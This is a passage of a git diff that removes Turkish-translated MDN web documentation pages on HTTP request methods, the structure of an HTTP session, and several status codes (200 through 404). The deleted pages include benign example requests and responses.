href="/tr/docs/Web/HTTP/Methods/PUT">PUT</a></code></dt> - <dd> - <p><code>PUT</code> <span class="tlid-translation translation" lang="tr">metodu hedefte bulunan kaynağın tüm geçerli temsillerinin yerine istek yükünü (request payload) koyar.</span></p> - </dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/DELETE">DELETE</a></code></dt> - <dd><code>DELETE</code> metodu belirtilen kaynağı siler.</dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/CONNECT">CONNECT</a></code></dt> - <dd> - <p><code>CONNECT</code> metodu <span class="tlid-translation translation" lang="tr">hedefteki kaynak tarafından tanımlanan sunucuya bir tünel oluşturur</span>.</p> - </dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/OPTIONS">OPTIONS</a></code></dt> - <dd><code>OPTIONS</code> metodu <span class="tlid-translation translation" lang="tr">hedefteki kaynağın iletişim seçeneklerini tanımlamak için kullanılır.</span></dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/TRACE">TRACE</a></code></dt> - <dd> - <p><code>TRACE</code> metodu <span class="tlid-translation translation" lang="tr">hedefteki kaynağa giden yol boyunca bir mesaj loop-back testi gerçekleştirir.</span></p> - </dd> - <dt><code><a href="/tr/docs/Web/HTTP/Methods/PATCH">PATCH</a></code></dt> - <dd><code>PATCH</code> metodu <span class="tlid-translation translation" lang="tr">bir kaynağa kısmi değişiklikler uygulamak için kullanılır.</span></dd> -</dl> - -<h2 id="Tanımlar">Tanımlar</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Başlık</th> - <th scope="col">Yorum</th> - </tr> - <tr> - <td>{{RFC("7231", "Request methods", "4")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - <td>GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE tanımlanıyor.</td> - </tr> - <tr> - <td>{{RFC("5789", "Patch method", "2")}}</td> - <td>PATCH Method for HTTP</td> - <td>PATCH tanımlanıyor.</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_uyumluluğu">Tarayıcı uyumluluğu</h2> - -<p class="hidden"><span class="tlid-translation translation" lang="tr">Bu uyumluluk verilerine katkıda bulunmak için, lütfen bu dosya için bir çekme isteği yazın</span>: <a href="https://github.com/mdn/browser-compat-data/blob/master/http/methods.json">https://github.com/mdn/browser-compat-data/blob/master/http/methods.json</a>.</p> - -<p>{{Compat("http/methods")}}</p> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li><a href="/tr/docs/Web/HTTP/Headers">HTTP başlıkları</a></li> -</ul> diff --git a/files/tr/web/http/session/index.html b/files/tr/web/http/session/index.html deleted file mode 100644 index 739b4102a6..0000000000 --- a/files/tr/web/http/session/index.html +++ /dev/null @@ -1,174 +0,0 @@ ---- -title: Tipik bir HTTP oturumu -slug: Web/HTTP/Session -tags: - - HTTP -translation_of: Web/HTTP/Session -original_slug: Web/HTTP/Oturum ---- -<div>{{HTTPSidebar}}</div> - -<p><span class="tlid-translation translation" lang="tr">HTTP gibi istemci-sunucu protokollerinde, oturumlar üç aşamadan oluşur:</span></p> - -<ol> - <li><span class="tlid-translation translation" lang="tr"> İstemci bir TCP bağlantısı kurar (veya taşıma katmanı TCP değilse uygun bir bağlantı kurar).</span></li> - <li><span class="tlid-translation translation" lang="tr">İstemci isteğini gönderir ve cevabı bekler.</span></li> - <li><span class="tlid-translation translation" lang="tr">Sunucu isteği işler, bir durum kodu ve uygun verileri içeren cevabını geri gönderir.</span></li> -</ol> - -<p>HTTP/1.1'den itibaren, artık <span class="tlid-translation translation" lang="tr">üçüncü aşama tamamlandıktan sonra bağlantı kapanmaz ve istemciye başka bir istek daha verilir: yani ikinci ve üçüncü aşamalar artık istenildiği kadar tekrarlanabilir.</span></p> - -<h2 id="Bağlantı_kurma">Bağlantı kurma</h2> - -<p><span class="tlid-translation translation" lang="tr">İstemci-sunucu protokollerinde bağlantıyı kuran istemcidir.</span> <span class="tlid-translation translation" lang="tr">HTTP'de bağlantı açmak, altta yatan taşıma katmanında bağlantı başlatmak anlamına gelir; bu da genellikle TCP'dir</span>.</p> - -<p><span class="tlid-translation translation" lang="tr">TCP ile bir bilgisayardaki HTTP sunucusu için varsayılan port 80'dir. 8000 veya 8080 gibi diğer portlar da kullanılabilir. </span> Getirilecek <span class="tlid-translation translation" lang="tr">sayfanın URL'si, alan adını ve port numarasını içerir; eğer port 80 ise yazılmasa da olur</span>. Ayrıntılı bilgi için bakınız: <a href="/tr/docs/Web/HTTP/Basics_of_HTTP/Identifying_resources_on_the_Web">Web'de kaynakları belirleme</a>.</p> - -<div class="note"><strong>Not:</strong> <span class="tlid-translation translation" lang="tr">İstemci-sunucu modeli, sunucunun istemciye açık bir istek olmadan veri göndermesine izin vermez. Bu soruna geçici bir çözüm bulmak için, web geliştiricileri bazı teknikler kullanmaktadır:</span> {{domxref("XMLHTTPRequest")}}, {{domxref("Fetch")}} API , <a href="/en/WebSockets" title="en/WebSockets">WebSockets API</a>, veya benzer protokolleri kullanarak düzenli aralıklarla sunucu ping'lenir.</div> - -<h2 id="İstemci_isteği_gönderimi">İstemci isteği gönderimi</h2> - -<p>Bağlantı kurulduktan sonra, kullanıcı aracısı -user agent- istek gönderebilir (kullanıcı aracısı genellikle bir web tarayıcısıdır, ancak crawler gibi başka bir program da olabilir). Bir istemci isteği, CRLF ile ayrılan (satır başı, ardından satır sonu karakteri), üç bloğa bölünmüş metin direktiflerinden oluşur:</p> - -<ol> - <li>İlk satırda bir istek yöntemi ve ardından gelen parametreleri bulunur: - <ul> - <li>belgenin yolu, yani protokol veya alan adı olmayan mutlak bir URL</li> - <li>HTTP protokolü sürümü</li> - </ul> - </li> - <li>Sonraki satırlar sunucuya hangi tür verilerin uygun olduğu (kullanılacak dil veya MIME türleri gibi) veya davranışını değiştiren başka veriler (örneğin önbelleğe alınmışsa bir yanıt göndermeme) hakkında bilgi veren bir HTTP başlığını temsil eder. Bu HTTP başlıkları boş bir satırla biten bir blok oluşturur.</li> - <li>Son blok genellikle POST metodu tarafından kullanılan ek verileri barındıran isteğe bağlı bir veri bloğudur.</li> -</ol> - -<h3 id="İstek_örnekleri">İstek örnekleri</h3> - -<p>developer.mozilla.org sitesinin kök sayfasını yani <a class="linkification-ext external" href="/" title="Linkification: http://developer.mozilla.org/">http://developer.mozilla.org/</a> sayfasını getirme, ve sunucuya kullanıcı aracısının sayfayı mümkünse Fransızca olarak tercih ettiğini bildirmek:</p> - -<pre>GET / HTTP/1.1 -Host: developer.mozilla.org -Accept-Language: fr -</pre> - -<p>Sondaki boş satırın veri bloğunu başlık bloğundan ayırdığına dikkat ediniz. HTTP başlığı olarak <code>Content-Length</code> belirtilmediğinden bu veri bloğu boş olarak sunulur, böylece başlıkların bittiğini işaret ederek sunucunun bu boş satırı alır almaz isteği işlemesine imkan verir.</p> - -<p>Örneğin bir formun sonucunu gönderme:</p> - -<pre>POST /iletisim_formu.php HTTP/1.1 -Host: developer.mozilla.org -Content-Length: 64 -Content-Type: application/x-www-form-urlencoded - -adi=Joe%20Kullanici&istegi=Bana%20bir%20katalog%20gonderir%20misiniz -</pre> - -<h3 id="İstek_metotları">İstek metotları</h3> - -<p>HTTP protokolü bir kaynak üzerinde gerçekleştirilmek istenen eylemi belirten bir dizi <a href="/tr/docs/Web/HTTP/Methods">istek metodu</a> tanımlamaktadır. Bu isteklere aslında isim de olabildikleri halde HTTP fiileri de denilir. En sık kullanılan istekler <code>GET</code> ve <code>POST</code>'tur:</p> - -<ul> - <li>{{HTTPMethod("GET")}} metodu belirtilen kaynağın bir veri temsilini talep eder. <code>GET</code> ile yapılan istekler yalnızca veri almalıdır.</li> - <li>{{HTTPMethod("POST")}} metodu sunucuya durumunu değiştirmesi için veri gönderir. <a href="/tr/docs/Web/Guide/HTML/Forms">HTML Formları</a>'nda genellikle bu metot kullanılır.</li> -</ul> - -<h2 id="Sunucu_yanıtının_yapısı">Sunucu yanıtının yapısı</h2> - -<p>Bağlanan aracı isteğini gönderdikten sonra, web sunucusu isteği işler ve sonuçta bir yanıt verir. İstemci isteğine benzer şekilde, sunucunun yanıtı CRLF ile ayrılan ve üç bloğa bölünmüş metin direktiflerinden oluşur:</p> - -<ol> - <li>İlk satır, <em>durum satırı</em>, kullanılan HTTP sürümünün onayı ve ardından bir durum isteğinden (ve insan tarafından okunabilen kısa bir açıklamadan) oluşur.</li> - <li>Sonraki satırlar gönderilen veri hakkında istemciye bilgi veren (tür, veri boyutu, kullanılan sıkıştırma algoritması, önbelleğe alma hakkında ipuçları vb.) belirli HTTP başlıklarını içerir. İstemci isteğinde olduğu gibi, bu HTTP başlıkları da boş bir satırla biten bir blok oluşturur.</li> - <li>Son blok isteğe bağlı verileri içeren bir veri bloğudur.</li> -</ol> - -<h3 id="Cevap_örnekleri">Cevap örnekleri</h3> - -<p>Başarılı bir web sayfası isteği yanıtı:</p> - -<pre>HTTP/1.1 200 OK -Content-Type: text/html; charset=utf-8 -Content-Length: 55743 -Connection: keep-alive -Cache-Control: s-maxage=300, public, max-age=0 -Content-Language: en-US -Date: Thu, 06 Dec 2018 17:37:18 GMT -ETag: "2e77ad1dc6ab0b53a2996dfd4653c1c3" -Server: meinheld/0.6.1 -Strict-Transport-Security: max-age=63072000 -X-Content-Type-Options: nosniff -X-Frame-Options: DENY -X-XSS-Protection: 1; mode=block -Vary: Accept-Encoding,Cookie -Age: 7 - - -<!DOCTYPE html> -<html lang="en"> -<head> - <meta charset="utf-8"> - <title>A simple webpage</title> -</head> -<body> - <h1>Simple HTML5 webpage</h1> - <p>Hello, world!</p> -</body> -</html> -</pre> - -<p>İstenen kaynağın kalıcı olarak taşındığını belirten bildirim:</p> - -<pre>HTTP/1.1 301 Moved Permanently -Server: Apache/2.4.37 (Red Hat) -Content-Type: text/html; charset=utf-8 -Date: Thu, 06 Dec 2018 17:33:08 GMT -Location: <a class="linkification-ext" href="../../../../" title="Linkification: https://developer.mozilla.org/">https://developer.mozilla.org/</a> <strong><em>(bu kaynağın taşındığı yeni bağlantıdır</em><em>; kullanıcı aracısının bunu getirmesi beklenir)</em></strong> -Keep-Alive: timeout=15, max=98 -Accept-Ranges: bytes -Via: Moz-Cache-zlb05 -Connection: Keep-Alive -Content-Length: 325 <em>(<strong>içerikte kullanıcı aracısının bağlantıyı takip edememesi halinde gösterilecek varsayılan sayfa bulunur)</strong></em> - - -<!DOCTYPE html... <strong><em>(kullanıcının eksik kaynağı bulmasına yardımcı olan özelleştirilmiş bir sayfa içerir)</em></strong> -</pre> - -<p>İstenen kaynağın bulunamadığını belirten bildirim:</p> - -<pre>HTTP/1.1 404 Not Found -Content-Type: text/html; charset=utf-8 -Content-Length: 38217 -Connection: keep-alive -Cache-Control: no-cache, no-store, must-revalidate, max-age=0 -Content-Language: en-US -Date: Thu, 06 Dec 2018 17:35:13 GMT -Expires: Thu, 06 Dec 2018 17:35:13 GMT -Server: meinheld/0.6.1 -Strict-Transport-Security: max-age=63072000 -X-Content-Type-Options: nosniff -X-Frame-Options: DENY -X-XSS-Protection: 1; mode=block -Vary: Accept-Encoding,Cookie -X-Cache: Error from cloudfront - - -<!DOCTYPE html... <strong><em>(kullanıcının eksik kaynağı bulmasına yardımcı olan özelleştirilmiş bir sayfa içerir)</em></strong> -</pre> - -<h3 id="Yanıt_durumu_kodları">Yanıt durumu kodları</h3> - -<p><a href="/tr/docs/Web/HTTP/Status">HTTP yanıt durumu kodları</a> belirli bir HTTP isteğinin başarıyla tamamlanıp tamamlanmadığını gösterir. Yanıtlar beş sınıfa ayrılır: bilgilendirme yanıtları, başarı yanıtları, yönlendirmeler, istemci hataları ve sunucu hataları.</p> - -<ul> - <li>{{HTTPStatus(200)}}: Tamam. İstek başarılı oldu.</li> - <li>{{HTTPStatus(301)}}: Kalıcı olarak taşındı. Bu yanıt kodu, istenen kaynağın URI'sinin değiştirildiği anlamına gelir.</li> - <li>{{HTTPStatus(404)}}: Bulunamadı. Sunucu istenen kaynağı bulamıyor demektir.</li> -</ul> - -<h2 id="Bakınız">Bakınız</h2> - -<ul> - <li><a href="/tr/docs/Web/HTTP/Basics_of_HTTP/Identifying_resources_on_the_Web">Web'de kaynakları belirleme</a></li> - <li><a href="/tr/docs/Web/HTTP/Headers">HTTP başlıkları</a></li> - <li><a href="/tr/docs/Web/HTTP/Methods">HTTP istek metotları</a></li> - <li><a href="/tr/docs/Web/HTTP/Status">HTTP yanıt durumu kodları </a></li> -</ul> diff --git a/files/tr/web/http/status/200/index.html b/files/tr/web/http/status/200/index.html deleted file mode 100644 index a0f72e76f1..0000000000 --- a/files/tr/web/http/status/200/index.html +++ /dev/null @@ -1,53 +0,0 @@ ---- -title: 200 OK -slug: Web/HTTP/Status/200 -tags: - - 200OK nedir - - 200OK oluşturma -translation_of: Web/HTTP/Status/200 ---- -<div>{{HTTPSidebar}}</div> - -<p>HTTP cevap durum kodu <strong><code>200 OK</code></strong> isteğin başarılı olduğunu ifade eder. Bu durum koduna sahip cevaplar, varsayılan olarak önbelleğe (cache) alınabilir.</p> - -<p>Başarılı isteğin ne anlama geldiği, yapılan HTTP isteğin türüne bağlıdır:</p> - -<ul> - <li>{{HTTPMethod("GET")}}: İstenilen kaynak bulundu ve dönen cevabın gövdesinde gönderildi.</li> - <li>{{HTTPMethod("HEAD")}}: Bütün başlık mesajları (HEADER) cevabın gövdesi olarak döner.</li> - <li>{{HTTPMethod("POST")}}: Yapılan isteğe karşılık gelen sonuç, cevabın gövdesinde gönderilir.</li> - <li>{{HTTPMethod("TRACE")}}: Sunucu, aldığı isteği cevabın gövdesi olarak gönderir.</li> -</ul> - -<p>Başarılı olan {{HTTPMethod("PUT")}} veya {{HTTPMethod("DELETE")}} isteği sonucunda dönen cevap genellikle <code>200</code> <code>OK</code> değil, <code>{{HTTPStatus("204")}}</code><code>No Content (veya bir kaynak ilk kez oluşturulmuşsa {{HTTPStatus("201")}}) Created)</code> olur.</p> - -<h2 id="Durum">Durum</h2> - -<pre class="syntaxbox notranslate">200 OK</pre> - -<h2 id="Şartnameler">Şartnameler</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7231", "200 OK" , "6.3.1")}}</td> - <td>Hypertext Transfer Protokolü (HTTP/1.1): Anlam ve İçerikler</td> - </tr> - </tbody> -</table> - -<h2 id="Tarayıcı_Uyumluluğu">Tarayıcı Uyumluluğu</h2> - -<p class="hidden">Tarayıcı uyumluluğu tablosu, hazır verilerden otomatik olarak oluşturulmuştur. Eğer bu verilere katkıda bulunmak isteseniz, <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> adresine gidin ve bize bir çekme isteğinde (pull request) bulunun.</p> - -<p>{{Compat("http.status.200")}}</p> - -<h2 id="Ayrıca_bakınız">Ayrıca bakınız</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/Methods">HTTP istek metodları</a></li> -</ul> diff --git a/files/tr/web/http/status/205/index.html b/files/tr/web/http/status/205/index.html deleted file mode 100644 index d212490377..0000000000 --- a/files/tr/web/http/status/205/index.html +++ /dev/null @@ -1,39 +0,0 @@ ---- -title: 205 Reset Content -slug: Web/HTTP/Status/205 -translation_of: Web/HTTP/Status/205 ---- -<p>{{HTTPSidebar}}</p> - -<p>The HTTP <strong><code>205 Reset Content</code></strong> response status tells the client to reset the document view, so for example to clear the content of a form, reset a canvas state, or to refresh the UI.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox">205 Reset Content</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7231", "205 Reset Content" , "6.3.6")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Compatibility_Notes">Compatibility Notes</h2> - -<ul> - <li>Browser behavior differs if this response erroneously includes a body on persistent connections See <a href="/en-US/docs/Web/HTTP/Status/204">204 No Content</a> for more detail.</li> -</ul> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus(204)}} No Content</li> -</ul> diff --git a/files/tr/web/http/status/301/index.html b/files/tr/web/http/status/301/index.html deleted file mode 100644 index a2dcab9a0d..0000000000 --- a/files/tr/web/http/status/301/index.html +++ /dev/null @@ -1,55 +0,0 @@ ---- -title: 301 Kalıcı Yönlendirme -slug: Web/HTTP/Status/301 -translation_of: Web/HTTP/Status/301 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HyperText Transfer Protocol (HTTP) <code><strong>301 Moved Permanently</strong></code> redirect status response code indicates that the resource requested has been definitively moved to the URL given by the {{HTTPHeader("Location")}} headers. A browser redirects to this page and search engines update their links to the resource (in 'SEO-speak', it is said that the 'link-juice' is sent to the new URL).</p> - -<p>Even if the specification requires the method (and the body) not to be altered when the redirection is performed, not all user-agents align with it - you can still find this type of bugged software out there. It is therefore recommended to use the <code>301</code> code only as a response for {{HTTPMethod("GET")}} or {{HTTPMethod("HEAD")}} methods and to use the {{HTTPStatus("308", "308 Permanent Redirect")}} for {{HTTPMethod("POST")}} methods instead, as the method change is explicitly prohibited with this status.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">301 Moved Permanently</pre> - -<h2 id="Example">Example</h2> - -<h3 id="Client_request">Client request</h3> - -<pre class="notranslate">GET /index.php HTTP/1.1 -Host: www.example.org</pre> - -<h3 id="Server_response">Server response</h3> - -<pre class="notranslate">HTTP/1.1 301 Moved Permanently -Location: http://www.example.org/index.asp</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7231", "301 Moved Permanently" , "6.4.2")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - - - -<p>{{Compat("http.status.301")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus("308", "308 Permanent Redirect")}}</li> - <li>{{HTTPStatus("302", "302 Found")}}, the temporary redirect</li> - <li><a href="https://www.exai.com/blog/301-redirects">301 Redirect </a></li> -</ul> diff --git a/files/tr/web/http/status/302/index.html b/files/tr/web/http/status/302/index.html deleted file mode 100644 index 061e7bfaa2..0000000000 --- a/files/tr/web/http/status/302/index.html +++ /dev/null @@ -1,47 +0,0 @@ ---- -title: 302 Geçici Yönlendirme -slug: Web/HTTP/Status/302 -translation_of: Web/HTTP/Status/302 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HyperText Transfer Protocol (HTTP) <code><strong>302 Found</strong></code> redirect status response code indicates that the resource requested has been temporarily moved to the URL given by the {{HTTPHeader("Location")}} header. A browser redirects to this page but search engines don't update their links to the resource (in 'SEO-speak', it is said that the 'link-juice' is not sent to the new URL).</p> - -<p>Even if the specification requires the method (and the body) not to be altered when the redirection is performed, not all user-agents conform here - you can still find this type of bugged software out there. It is therefore recommended to set the <code>302</code> code only as a response for {{HTTPMethod("GET")}} or {{HTTPMethod("HEAD")}} methods and to use {{HTTPStatus("307", "307 Temporary Redirect")}} instead, as the method change is explicitly prohibited in that case.</p> - -<p>In the cases where you want the method used to be changed to {{HTTPMethod("GET")}}, use {{HTTPStatus("303", "303 See Other")}} instead. This is useful when you want to give a response to a {{HTTPMethod("PUT")}} method that is not the uploaded resource but a confirmation message such as: 'you successfully uploaded XYZ'.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">302 Found</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "302 Found" , "6.4.3")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - - - -<p>{{Compat("http.status.302")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus("307", "307 Temporary Redirect")}}, the equivalent of this status code where the method used never changes.</li> - <li>{{HTTPStatus("303", "303 See Other")}}, a temporary redirect that changes the method used to {{HTTPMethod("GET")}}.</li> - <li>{{HTTPStatus("301", "301 Moved Permanently")}}, the permanent redirect.</li> -</ul> diff --git a/files/tr/web/http/status/400/index.html b/files/tr/web/http/status/400/index.html deleted file mode 100644 index 2d6f8ea50a..0000000000 --- a/files/tr/web/http/status/400/index.html +++ /dev/null @@ -1,37 +0,0 @@ ---- -title: 400 Kötü İstek -slug: Web/HTTP/Status/400 -translation_of: Web/HTTP/Status/400 ---- -<p>{{HTTPSidebar}}</p> - -<p>The HyperText Transfer Protocol (HTTP) <code><strong>400 Bad Request</strong></code> response status code indicates that the server cannot or will not process the request due to something that is perceived to be a client error (e.g., malformed request syntax, invalid request message framing, or deceptive request routing).</p> - -<div class="warning"> -<p>The client should not repeat this request without modification.</p> -</div> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">400 Bad Request </pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7231", "400 Bad Request" , "6.5.1")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="See_Also">See Also</h2> - -<ul> - <li><a href="https://www.exai.com/blog/400-bad-request-error">400 Bad Request </a></li> -</ul> diff --git a/files/tr/web/http/status/401/index.html b/files/tr/web/http/status/401/index.html deleted file mode 100644 index 1eb6e7c0d7..0000000000 --- a/files/tr/web/http/status/401/index.html +++ /dev/null @@ -1,54 +0,0 @@ ---- -title: 401 Yetkisiz -slug: Web/HTTP/Status/401 -translation_of: Web/HTTP/Status/401 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HTTP <strong><code>401 Unauthorized</code></strong> client error status response code indicates that the request has not been applied because it lacks valid authentication credentials for the target resource.</p> - -<p>This status is sent with a {{HTTPHeader("WWW-Authenticate")}} header that contains information on how to authorize correctly.</p> - -<p>This status is similar to {{HTTPStatus("403")}}, but in this case, authentication is possible.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">401 Unauthorized</pre> - -<h2 id="Example_response">Example response</h2> - -<pre class="notranslate">HTTP/1.1 401 Unauthorized -Date: Wed, 21 Oct 2015 07:28:00 GMT -WWW-Authenticate: Basic realm="Access to staging site"</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <tbody> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - <tr> - <td>{{RFC("7235", "401 Unauthorized" , "3.1")}}</td> - <td>HTTP/1.1: Authentication</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.401")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/Authentication">HTTP authentication</a></li> - <li>{{HTTPHeader("WWW-Authenticate")}}</li> - <li>{{HTTPHeader("Authorization")}}</li> - <li>{{HTTPHeader("Proxy-Authorization")}}</li> - <li>{{HTTPHeader("Proxy-Authenticate")}}</li> - <li>{{HTTPStatus("403")}}, {{HTTPStatus("407")}}</li> -</ul> diff --git a/files/tr/web/http/status/402/index.html b/files/tr/web/http/status/402/index.html deleted file mode 100644 index bc74ce45f1..0000000000 --- a/files/tr/web/http/status/402/index.html +++ /dev/null @@ -1,49 +0,0 @@ ---- -title: 402 Ödeme Gerekli -slug: Web/HTTP/Status/402 -translation_of: Web/HTTP/Status/402 ---- -<div>{{HTTPSidebar}}{{SeeCompatTable}}</div> - -<p>The HTTP <strong><code>402 Payment Required</code></strong> is a nonstandard client error status response code that is reserved for future use.</p> - -<p>Sometimes, this code indicates that the request can not be processed until the client makes a payment. Originally it was created to enable digital cash or (micro) payment systems and would indicate that the requested content is not available until the client makes a payment. However, no standard use convention exists and different entities use it in different contexts.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">402 Payment Required</pre> - -<h2 id="Example_response">Example response</h2> - -<pre class="brush: bash notranslate">HTTP/1.1 402 Payment Required -Date: Wed, 21 Oct 2015 07:28:00 GMT -</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "402 Payment Required" , "6.5.2")}}</td> - <td>HTTP/1.1: Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - - - -<p>{{Compat("http.status.402")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li><a href="/en-US/docs/Web/HTTP/Authentication">HTTP authentication</a></li> -</ul> diff --git a/files/tr/web/http/status/403/index.html b/files/tr/web/http/status/403/index.html deleted file mode 100644 index e167459808..0000000000 --- a/files/tr/web/http/status/403/index.html +++ /dev/null @@ -1,52 +0,0 @@ ---- -title: 403 Yasaklı -slug: Web/HTTP/Status/403 -translation_of: Web/HTTP/Status/403 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HTTP <strong><code>403 Forbidden</code></strong> client error status response code indicates that the server understood the request but refuses to authorize it.</p> - -<p>This status is similar to {{HTTPStatus("401")}}, but in this case, re-authenticating will make no difference. The access is permanently forbidden and tied to the application logic, such as insufficient rights to a resource.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">403 Forbidden</pre> - -<h2 id="Example_response">Example response</h2> - -<pre class="notranslate">HTTP/1.1 403 Forbidden -Date: Wed, 21 Oct 2015 07:28:00 GMT -</pre> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "403 Forbidden" , "6.5.3")}}</td> - <td>HTTP/1.1: Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.403")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus("401")}}</li> - <li><a href="https://kinsta.com/blog/403-forbidden-error/">403 forbidden error</a></li> - <li><a href="https://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html" rel="noopener">HTTP/1.1: Status Code Definitions</a></li> - <li><a href="https://www.exai.com/blog/403-forbidden">403 forbidden </a></li> -</ul> diff --git a/files/tr/web/http/status/404/index.html b/files/tr/web/http/status/404/index.html deleted file mode 100644 index 15189bdf9f..0000000000 --- a/files/tr/web/http/status/404/index.html +++ /dev/null @@ -1,61 +0,0 @@ ---- -title: 404 Bulunamadı -slug: Web/HTTP/Status/404 -translation_of: Web/HTTP/Status/404 ---- -<div>{{HTTPSidebar}}</div> - -<p>The HTTP <code><strong>404 Not Found</strong></code> client error response code indicates that the server can't find the requested resource. Links which lead to a 404 page are often called broken or dead links, and can be subject to <a href="https://en.wikipedia.org/wiki/Link_rot">link rot</a>.</p> - -<p>A 404 status code does not indicate whether the resource is temporarily or permanently missing. But if a resource is permanently removed, a {{HTTPStatus("410")}} (Gone) should be used instead of a 404 status.</p> - -<h2 id="Status">Status</h2> - -<pre class="syntaxbox notranslate">404 Not Found</pre> - -<h2 id="Custom_error_pages">Custom error pages</h2> - -<p>Many web sites customize the look of a 404 page to be more helpful to the user and provide guidance on what to do next. Apache servers can be configured using an <code>.htaccess</code> file and a code snippet like the following example.</p> - -<pre class="brush: bash notranslate">ErrorDocument 404 /notfound.html</pre> - -<p>For an example of a custom 404 page, see <a href="https://developer.mozilla.org/en-US/404">MDN's 404 page</a>.</p> - -<div class="note"> -<p>Custom design is a good thing, in moderation. Feel free to make your 404 page humorous and human, but don't confuse your users.</p> -</div> - -<h2 id="Specifications">Specifications</h2> - -<table class="standard-table"> - <thead> - <tr> - <th scope="col">Specification</th> - <th scope="col">Title</th> - </tr> - </thead> - <tbody> - <tr> - <td>{{RFC("7231", "404 Not Found" , "6.5.4")}}</td> - <td>Hypertext Transfer Protocol (HTTP/1.1): Semantics and Content</td> - </tr> - </tbody> -</table> - -<h2 id="Browser_compatibility">Browser compatibility</h2> - -<p class="hidden">The compatibility table in this page is generated from structured data. If you'd like to contribute to the data, please check out <a href="https://github.com/mdn/browser-compat-data">https://github.com/mdn/browser-compat-data</a> and send us a pull request.</p> - -<p>{{Compat("http.status.404")}}</p> - -<h2 id="See_also">See also</h2> - -<ul> - <li>{{HTTPStatus("410")}}</li> - <li> - <p>{{interwiki("wikipedia", "HTTP_404", "Wikipedia: HTTP 404")}}</p> - </li> - <li> - <p><a class="external" href="https://www.exai.com/blog/404-http-error" rel="noopener">404 Error </a></p> - </li> -</ul> diff --git a/files/tr/web/http/status/405/index.html b/files/tr/web/http/status/405/index.html deleted file mode 100644 index ef06ed441a..0000000000 --- a/files/tr/web/http/status/405/index.html +++ /dev/null @@ -1,42 +0,0 @@ ---- -title: 405 İzin Verilmeyen Metot -slug: 